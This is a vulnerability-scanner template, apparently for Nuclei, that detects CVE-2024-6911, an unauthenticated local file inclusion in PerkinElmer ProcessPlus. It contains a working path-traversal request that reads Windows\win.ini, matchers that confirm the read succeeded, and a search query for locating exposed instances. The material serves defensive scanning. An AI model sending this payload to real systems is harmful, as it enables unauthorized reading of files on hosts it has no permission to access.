57 lines
1.9 KiB
YAML
57 lines
1.9 KiB
YAML
id: CVE-2024-6911
|
|
|
|
info:
|
|
name: PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion
|
|
author: s4e-io
|
|
severity: high
|
|
description: |
|
|
Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue affects ProcessPlus through 1.11.6507.0.
|
|
reference:
|
|
- http://seclists.org/fulldisclosure/2024/Jul/13
|
|
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-perten-processplus/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-6911
|
|
- https://github.com/adminlove520/pocWiki
|
|
classification:
|
|
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
|
|
cvss-score: 8.7
|
|
cve-id: CVE-2024-6911
|
|
cwe-id: CWE-552
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09524
|
|
cpe: cpe:2.3:a:perkinelmer:processplus:1.11.6507:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: perkinelmer
|
|
product: processplus
|
|
fofa-query: '"Process Plus" && icon_hash="1772087922"'
|
|
tags: cve,cve2024,processplus,intrusive,lfi,seclists
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /ProcessPlus HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body,"<title>Process Plus - Perten Instruments</title>")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\win.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body,"bit app support","fonts","extensions")'
|
|
- 'contains(content_type, "text/plain")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 490a0046304402201c90d857b5766cf250435823e8649e4e8126ac488e6c89b2ccfa02d1a85b45e1022026411d3307dd203f4658b4b5043074e7f5be88c27d01dd95d247b816d620d65a:922c64590222798bb761d5b6d8e72950 |